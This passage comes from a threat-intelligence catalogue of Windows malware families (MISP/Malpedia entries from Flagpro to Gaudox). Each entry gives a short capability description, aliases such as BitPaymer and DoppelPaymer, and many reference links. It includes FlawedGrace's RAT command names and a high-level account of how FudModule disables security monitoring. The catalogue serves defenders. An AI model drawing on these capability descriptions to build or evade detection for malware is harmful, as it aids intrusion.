https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html

https://www.crowdstrike.com/blog/new-ransomware-variant-uses-golang-packer/

https://www.cisa.gov/uscert/ncas/alerts/aa22-249a

https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire

Flagpro

According to PICUS, Flagpro is malware that collects information from the victim and executes commands in the victim’s environment. It targets Japan, Taiwan, and English-speaking countries. When a victim is infected with Flagpro malware, the malware can do the following:

Download and execute a tool Execute OS commands and send results Collect and send Windows authentication information

The tag is: misp-galaxy:malpedia="Flagpro"

Flagpro is also known as:

  • BUSYICE

Table 3505. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.flagpro

https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_8_hara_en.pdf

https://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech

https://vblocalhost.com/uploads/VB2021-50.pdf

https://jp.security.ntt/resources/EN-BlackTech_2021.pdf

https://insight-jp.nttsecurity.com/post/102h7vx/blacktechflagpro

https://cyberandramen.net/2021/12/12/more-flagpro-more-problems/

FLASHFLOOD

 FLASHFLOOD will scan inserted removable drives for targeted files, and copy those files from the
removable drive to the FLASHFLOOD-infected system. FLASHFLOOD may also log or copy additional data from the victim computer, such as system information
or contacts.

The tag is: misp-galaxy:malpedia="FLASHFLOOD"

FLASHFLOOD is also known as:

Table 3507. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.flashflood

https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

FlawedAmmyy

FlawedAmmyy is a well-known Remote Access Tool (RAT) attributed to criminal gang TA505 and used to get the control of target machines. The name reminds the strong link with the leaked source code of Ammyy Admin from which it took the main structure.

The tag is: misp-galaxy:malpedia="FlawedAmmyy"

FlawedAmmyy is also known as:

Table 3508. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedammyy

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf

https://attack.mitre.org/software/S0381/

https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://www.secureworks.com/research/threat-profiles/gold-tahoe

https://habr.com/ru/company/pt/blog/475328/

https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/

https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do

https://www.sans.org/reading-room/whitepapers/reverseengineeringmalware/unpacking-decrypting-flawedammyy-38930

https://www.proofpoint.com/us/threat-insight/post/ta505-begins-summer-campaigns-new-pet-malware-downloader-andromut-uae-south

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat

https://www.youtube.com/watch?v=N4f2e8Mygag

https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/

https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks

https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf

https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505/

https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/

https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/

https://intel471.com/blog/a-brief-history-of-ta505

FlawedGrace

According to ProofPoint, FlawedGrace is written in C++ and can be categorized as a Remote Access Trojan (RAT). It seems to have been developed in the second half of 2017 mainly.

FlawedGrace uses a series of commands: FlawedGrace also uses a series of commands, provided below for reference: * desktop_stat * destroy_os * target_download * target_module_load * target_module_load_external * target_module_unload * target_passwords * target_rdp * target_reboot * target_remove * target_script * target_servers * target_update * target_upload

The tag is: misp-galaxy:malpedia="FlawedGrace"

FlawedGrace is also known as:

  • GraceWire

Table 3509. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedgrace

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://blog.codsec.com/posts/malware/gracewire_adventure/

https://www.msreverseengineering.com/blog/2019/1/14/a-quick-solution-to-an-ugly-reverse-engineering-problem

https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf

https://twitter.com/MsftSecIntel/status/1273359829390655488

https://research.nccgroup.com/2021/12/01/tracking-a-p2p-network-related-with-ta505/

https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505

https://www.proofpoint.com/us/blog/threat-insight/whatta-ta-ta505-ramps-activity-delivers-new-flawedgrace-variant

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://www.secureworks.com/research/threat-profiles/gold-tahoe

https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/

https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf

https://www.msreverseengineering.com/blog/2021/3/2/an-exhaustively-analyzed-idb-for-flawedgrace

https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/

https://web.archive.org/web/20221115161556/https://blog.codsec.com/posts/malware/gracewire_adventure/

https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/

https://intel471.com/blog/a-brief-history-of-ta505

FlexiSpy (Windows)

The tag is: misp-galaxy:malpedia="FlexiSpy (Windows)"

FlexiSpy (Windows) is also known as:

Table 3510. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.flexispy

https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/

Flusihoc

Available since 2015, Flusihoc is a versatile C++ malware capable of a variety of DDoS attacks as directed by a Command and Control server. Flusihoc communicates with its C2 via HTTP in plain text.

The tag is: misp-galaxy:malpedia="Flusihoc"

Flusihoc is also known as:

Table 3515. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.flusihoc

https://www.arbornetworks.com/blog/asert/the-flusihoc-dynasty-a-long-standing-ddos-botnet/

FlyingDutchman

The tag is: misp-galaxy:malpedia="FlyingDutchman"

FlyingDutchman is also known as:

Table 3516. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.flying_dutchman

https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/

Formbook

FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.

The tag is: misp-galaxy:malpedia="Formbook"

Formbook is also known as:

  • win.xloader

Table 3521. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

https://www.cyren.com/blog/articles/example-analysis-of-multi-component-malware

https://asec.ahnlab.com/en/32149/

https://github.com/itaymigdal/malware-analysis-writeups/blob/main/FormBook/FormBook.md

https://drive.google.com/file/d/1oxINyIJfMtv_upJqRK9vLSchIBaU8wiU/view

https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf

https://www.cyberbit.com/formbook-research-hints-large-data-theft-attack-brewing/

https://www.malware-traffic-analysis.net/2023/06/05/index.html

https://youtu.be/aQwnHIlGSBM

https://blog.cyble.com/2022/07/01/xloader-returns-with-new-infection-technique/

https://blog.talosintelligence.com/2018/06/my-little-formbook.html

https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/

https://isc.sans.edu/diary/26806

https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/

https://tccontre.blogspot.com/2020/11/interesting-formbook-crypter.html

https://cert.gov.ua/article/955924

https://insights.oem.avira.com/a-new-technique-to-analyze-formbook-malware-infections/

https://www.fortinet.com/blog/threat-research/deep-analysis-formbook-new-variant-delivered-phishing-campaign-part-ii

https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/

https://www.ciphertechsolutions.com/roboski-global-recovery-automation/

https://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two

https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware

https://www.lac.co.jp/lacwatch/report/20220307_002893.html

https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/trojanized-onenote-document-leads-to-formbook-malware/

https://elastic.github.io/security-research/intelligence/2022/01/01.formbook-adopts-cabless-approach/article/

https://www.trendmicro.com/en_us/research/21/i/formbook-adds-latest-office-365-0-day-vulnerability-cve-2021-404.html

https://kienmanowar.wordpress.com/2023/07/06/quicknote-examining-formbook-campaign-via-phishing-emails/

https://www.peerlyst.com/posts/how-to-understand-formbook-a-new-malware-as-a-service-sudhendu?

https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors

https://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882

https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko

https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/

https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/

http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html

https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html

https://blog.malwarebytes.com/threat-analysis/2021/05/revisiting-the-nsis-based-crypter/

https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/

https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-inside-formbook-infostealer/

https://link.medium.com/uaBiIXgUU8

https://securityintelligence.com/posts/roboski-global-recovery-automation/

https://yoroi.company/research/office-documents-may-the-xll-technique-change-the-threat-landscape-in-2022/

https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf

https://usualsuspect.re/article/formbook-hiding-in-plain-sight

https://www.connectwise.com/resources/formbook-remcos-rat

https://www.fortinet.com/blog/threat-research/deep-analysis-new-formbook-variant-delivered-phishing-campaign-part-I

https://forensicitguy.github.io/xloader-formbook-velvetsweatshop-spreadsheet/

https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/

https://www.zscaler.com/blogs/security-research/technical-analysis-xloaders-code-obfuscation-version-43

https://www.cyberbit.com/blog/endpoint-security/formbook-research-hints-large-data-theft-attack-brewing/

http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/

https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html

https://news.sophos.com/en-us/2020/05/14/raticate/

https://www.zscaler.com/blogs/security-research/analysis-xloaders-c2-network-encryption

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://blogs.blackberry.com/en/2021/09/threat-thursday-xloader-infostealer

http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord

https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/

https://www.netskope.com/blog/new-formbook-campaign-delivered-through-phishing-emails

https://www.botconf.eu/wp-content/uploads/2018/12/2018-R-Jullian-In-depth-Formbook-Malware-Analysis.pdf

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout

https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://www.peerlyst.com/posts/how-to-analyse-formbook-a-new-malware-as-a-service-sudhendu?trk=explore_page_resources_recent

https://blog.netlab.360.com/purecrypter

https://blogs.quickheal.com/formbook-malware-returns-new-variant-uses-steganography-and-in-memory-loading-of-multiple-stages-to-steal-data/

FortuneCrypt

The tag is: misp-galaxy:malpedia="FortuneCrypt"

FortuneCrypt is also known as:

Table 3523. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fortunecrypt

https://securelist.com/ransomware-two-pieces-of-good-news/93355/

FRat

A RAT employing Node.js, Sails, and Socket.IO to collect information on a target

The tag is: misp-galaxy:malpedia="FRat"

FRat is also known as:

Table 3525. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.frat

https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/frat.md

FriedEx

The tag is: misp-galaxy:malpedia="FriedEx"

FriedEx is also known as:

  • BitPaymer

  • DoppelPaymer

  • IEncrypt

Table 3527. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex

https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf

https://www.secureworks.com/research/threat-profiles/gold-drake

https://blog.trendmicro.com/trendlabs-security-intelligence/account-with-admin-privileges-abused-to-install-bitpaymer-ransomware-via-psexec

https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf

https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/

https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/

https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/

https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf

https://killingthebear.jorgetesta.tech/actors/evil-corp

https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/

https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp

https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/

https://www.bleepingcomputer.com/news/security/doppelpaymer-ransomware-launches-site-to-post-victims-data/

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.youtube.com/watch?v=LUxOcpIRxmg

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks/

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/

http://www.secureworks.com/research/threat-profiles/gold-drake

https://sites.temple.edu/care/ci-rw-attacks/

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/

https://lka.polizei.nrw/presse/schlag-gegen-international-agierendes-netzwerk-von-cyber-kriminellen

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/everis-bitpaymer-ransomware-attack-analysis-dridex/

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

https://www.armor.com/resources/threat-intelligence/the-evolution-of-doppel-spider-from-bitpaymer-to-grief-ransomware/

FudModule

FudModule is a user-mode DLL that gets the ability to read and write arbitrary kernel memory via the BYOVD technique. Its main goal is to turn off Windows system monitoring features, which is done by modifying kernel variables and removing kernel callbacks. Its actions may very likely affect various types of security products, e.g. EDRs, firewalls, antimalware and even digital forensics tools.

The tag is: misp-galaxy:malpedia="FudModule"

FudModule is also known as:

  • LIGHTSHOW

Table 3528. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fudmodule

https://securityintelligence.com/posts/defensive-considerations-lazarus-fudmodule/

https://securityintelligence.com/posts/direct-kernel-object-manipulation-attacks-etw-providers/

https://asec.ahnlab.com/wp-content/uploads/2022/09/Analysis-Report-on-Lazarus-Groups-Rootkit-Attack-Using-BYOVD_Sep-22-2022.pdf

https://www.mandiant.com/resources/blog/lightshift-and-lightshow

https://asec.ahnlab.com/ko/40495/

https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/

https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Lazarus-and-BYOVD-evil-to-the-Windows-core.pdf

win.fujinama

Fujinama is a custom VB info stealer capable to execute custom commands and custom exfiltrations, keylogging and screenshot. It was involved in the compromise of Leonardo SpA, a major Italian aerospace and defense company.

The tag is: misp-galaxy:malpedia="win.fujinama"

win.fujinama is also known as:

Table 3529. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fujinama

https://reaqta.com/2021/01/fujinama-analysis-leonardo-spa

Furtim

The tag is: misp-galaxy:malpedia="Furtim"

Furtim is also known as:

Table 3532. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.furtim

https://sentinelone.com/blogs/sfg-furtims-parent/

FusionDrive

The tag is: misp-galaxy:malpedia="FusionDrive"

FusionDrive is also known as:

Table 3533. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fusiondrive

https://www.youtube.com/watch?v=_qdCGgQlHJE

FuwuqiDrama

FuwuqiDrama is a server-side RAT. It manages client connections by utilizing I/O completion ports, which are usually used in high-performance server applications as an elegant solution to manage many clients at once.

It contains two distinguishing hardcoded lists.

First is a list of ~50 video files of South Korean TV series, having their titles translated to Mandarin Chinese, but encoded in the form of Pinyin romanization. That means the sounds are spelled in Latin alphabet without tone marks, for example meiyounihuobuxiaqu.avi represents Can’t Live Without You (a K-drama from 2012) or wulalafufu.avi translates to Ohlala Couple (also from 2012).

Second is the list of the following corporations: NVIDIA, Amazon, Intel, Skype, 360Safe, Rising, Tencent, Mozilla, Adobe, Yahoo, Google. The same list is contained in some of the WannaCryptor samples.

FuwuqiDrama stores its configuration in the INI file data\package_con_x86.cat. It contains the port number and a bot identifier, all within a single section called Fuwuqi – the romanized Chinese word for server.

The tag is: misp-galaxy:malpedia="FuwuqiDrama"

FuwuqiDrama is also known as:

Table 3534. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fuwuqidrama

https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf

FuxSocy

FuxSocy has some similarities to win.cerber but is tracked as its own family for now.

The tag is: misp-galaxy:malpedia="FuxSocy"

FuxSocy is also known as:

Table 3535. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.fuxsocy

https://www.bleepingcomputer.com/news/security/new-fuxsocy-ransomware-impersonates-the-notorious-cerber/

http://id-ransomware.blogspot.com/2019/10/fuxsocy-encryptor-ransomware.html

Gacrux

The tag is: misp-galaxy:malpedia="Gacrux"

Gacrux is also known as:

Table 3536. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gacrux

https://krabsonsecurity.com/2020/10/24/gacrux-a-basic-c-malware-with-a-custom-pe-loader/

GalaxyLoader

GalaxyLoader is a simple .NET loader. Its name stems from the .pdb and the function naming.

It seems to make use of iplogger.com for tracking. It employed WMI to check the system for - IWbemServices::ExecQuery - SELECT * FROM Win32_Processor - IWbemServices::ExecQuery - select * from Win32_VideoController - IWbemServices::ExecQuery - SELECT * FROM AntivirusProduct

The tag is: misp-galaxy:malpedia="GalaxyLoader"

GalaxyLoader is also known as:

Table 3537. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.galaxyloader

gamapos

The tag is: misp-galaxy:malpedia="gamapos"

gamapos is also known as:

  • pios

Table 3538. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gamapos

http://documents.trendmicro.com/assets/GamaPOS_Technical_Brief.pdf

Gameover DGA

The tag is: misp-galaxy:malpedia="Gameover DGA"

Gameover DGA is also known as:

Table 3539. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_dga

Gameover P2P

Gameover ZeuS is a peer-to-peer botnet based on components from the earlier ZeuS trojan. According to a report by Symantec, Gameover Zeus has largely been used for banking fraud and distribution of the CryptoLocker ransomware. In early June 2014, the U.S. Department of Justice announced that an international inter-agency collaboration named Operation Tovar had succeeded in temporarily cutting communication between Gameover ZeuS and its command and control servers.

The tag is: misp-galaxy:malpedia="Gameover P2P"

Gameover P2P is also known as:

  • GOZ

  • Mapp

  • ZeuS P2P

Table 3540. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_p2p

https://www.blackhat.com/docs/us-15/materials/us-15-Peterson-GameOver-Zeus-Badguys-And-Backends.pdf

https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware

https://www.wired.com/2017/03/russian-hacker-spy-botnet/

https://www.wired.com/?p=2171700

https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf

https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf

https://www.lawfareblog.com/what-point-these-nation-state-indictments

https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf

https://bin.re/blog/three-variants-of-murofets-dga/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf

https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group

https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/

https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf

https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware

http://www.syssec-project.eu/m/page-media/3/zeus_malware13.pdf

https://www.intel471.com/blog/cybercrime-russia-china-iran-nation-state

https://nbviewer.org/github/tildedennis/zeusmuseum/blob/master/jupyter_notebooks/gameover/2014-05-28/Gameover%20version%202014-05-28.ipynb

Gamotrol

The tag is: misp-galaxy:malpedia="Gamotrol"

Gamotrol is also known as:

Table 3542. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gamotrol

Gandcrab

GandCrab was a Ransomware-as-a-Service (RaaS) emerged in January 28, 2018, managed by a criminal organization known to be confident and vocal, while running a rapidly evolving ransomware campaign. Through their aggressive, albeit unusual, marketing strategies and constant recruitment of affiliates, they were able to globally distribute a high volume of their malware.

In a surprising announcement on May 31, 2019, the GandCrab’s operators posted on a dark web forum, announced the end of a little more than a year of ransomware operations, citing staggering profit figures. However, If there’s one thing that sets these threat actors apart from other groups, it is that they are unpredictable; so there is always the possibility that they might re-surface in one form or another.

The tag is: misp-galaxy:malpedia="Gandcrab"

Gandcrab is also known as:

  • GrandCrab

Table 3543. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab

https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/

http://asec.ahnlab.com/1145

https://tccontre.blogspot.com/2018/11/re-gandcrab-downloader-theres-more-to.html

http://www.secureworks.com/research/threat-profiles/gold-garden

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1

https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-shutting-down-after-claiming-to-earn-25-billion/

https://labs.bitdefender.com/2018/02/gandcrab-ransomware-decryption-tool-available-for-free/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf

https://unit42.paloaltonetworks.com/revil-threat-actors/

https://vimeo.com/449849549

https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks

https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/

https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-operator-arrested-in-belarus/

https://www.virusbulletin.com/virusbulletin/2020/01/behind-scenes-gandcrabs-operation/

https://blog.malwarebytes.com/threat-analysis/2019/01/vidar-gandcrab-stealer-and-ransomware-combo-observed-in-the-wild/

https://isc.sans.edu/diary/23417

https://teamt5.org/en/posts/introducing-the-most-profitable-ransomware-revil/

https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel

https://www.fortinet.com/blog/threat-research/gandcrab-threat-actors-retire.html

https://www.virusbulletin.com/virusbulletin/2019/11/vb2019-paper-different-ways-cook-crab-gandcrab-ransomware-service-raas-analysed-indepth/

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://hotforsecurity.bitdefender.com/blog/belarus-authorities-arrest-gandcrab-ransomware-operator-23860.html

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf

https://labs.bitdefender.com/2019/06/good-riddance-gandcrab-were-still-fixing-the-mess-you-left-behind

https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf

https://www.scmagazine.com/home/security-news/ransomware/gandcrab-ransomware-operators-put-in-retirement-papers/

https://sensorstechforum.com/killswitch-file-now-available-gandcrab-v4-1-2-ransomware/

https://www.europol.europa.eu/newsroom/news/pay-no-more-universal-gandcrab-decryption-tool-released-for-free-no-more-ransom

https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights

https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html

https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/

https://krebsonsecurity.com/2019/07/whos-behind-the-gandcrab-ransomware/

https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/

https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/

https://www.secureworks.com/research/threat-profiles/gold-garden

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

http://www.vmray.com/cyber-security-blog/gandcrab-ransomware-evolution-analysis/

https://www.youtube.com/watch?v=LUxOcpIRxmg

https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf

https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/

https://news.sophos.com/en-us/2019/03/05/gandcrab-101-all-about-the-most-widely-distributed-ransomware-of-the-moment/

https://web.archive.org/web/20190331091056/https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/

https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf

https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html

https://asec.ahnlab.com/en/41450/

https://labs.bitdefender.com/2019/02/new-gandcrab-v5-1-decryptor-available-now/

https://news.sophos.com/en-us/2019/05/24/gandcrab-spreading-via-directed-attacks-against-mysql-servers/

https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

https://intel471.com/blog/a-brief-history-of-ta505

Gasket

A backdoor used by Mespinoza ransomware gang to maintain access to a compromised network.

The tag is: misp-galaxy:malpedia="Gasket"

Gasket is also known as:

Table 3544. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gasket

https://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/

Gaudox

Gaudox is a http loader, written in C/C++. The author claims to have put much effort into making this bot efficient and stable. Its rootkit functionality hides it in Windows Explorer (32bit only).

